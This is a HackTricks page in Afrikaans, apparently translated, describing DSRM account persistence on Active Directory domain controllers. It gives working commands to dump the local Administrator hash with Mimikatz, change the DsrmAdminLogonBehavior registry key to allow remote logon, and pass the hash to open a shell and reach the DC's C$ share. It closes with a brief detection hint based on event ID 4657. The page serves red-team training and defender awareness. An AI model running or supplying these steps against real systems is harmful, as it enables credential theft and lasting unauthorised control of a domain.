4.1 KiB
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling van eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
DSRM-referensies
Daar is 'n plaaslike administrateur-rekening binne elke DC. Deur admin-voorregte op hierdie masjien te hê, kan jy mimikatz gebruik om die plaaslike Administrateur-hash uit te dump. Daarna kan jy 'n register wysig om hierdie wagwoord te aktiveer, sodat jy vanaf 'n afstand toegang kan verkry tot hierdie plaaslike Administrateur-gebruiker.
Eerstens moet ons die hash van die plaaslike Administrateur-gebruiker binne die DC dump:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Dan moet ons nagaan of daardie rekening sal werk, en as die register sleutel die waarde "0" het of nie bestaan nie, moet jy dit stel na "2":
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
Daarna kan jy met behulp van 'n PTH die inhoud van C$ lys of selfs 'n skul verkry. Let daarop dat vir die skep van 'n nuwe PowerShell-sessie met daardie hash in die geheue (vir die PTH) die "domain" wat gebruik word, net die naam van die DC-masjien is:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
Meer inligting hieroor in: https://adsecurity.org/?p=1714 en https://adsecurity.org/?p=1785
Versagting
- Gebeurtenis-ID 4657 - Toets die skep/verandering van
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.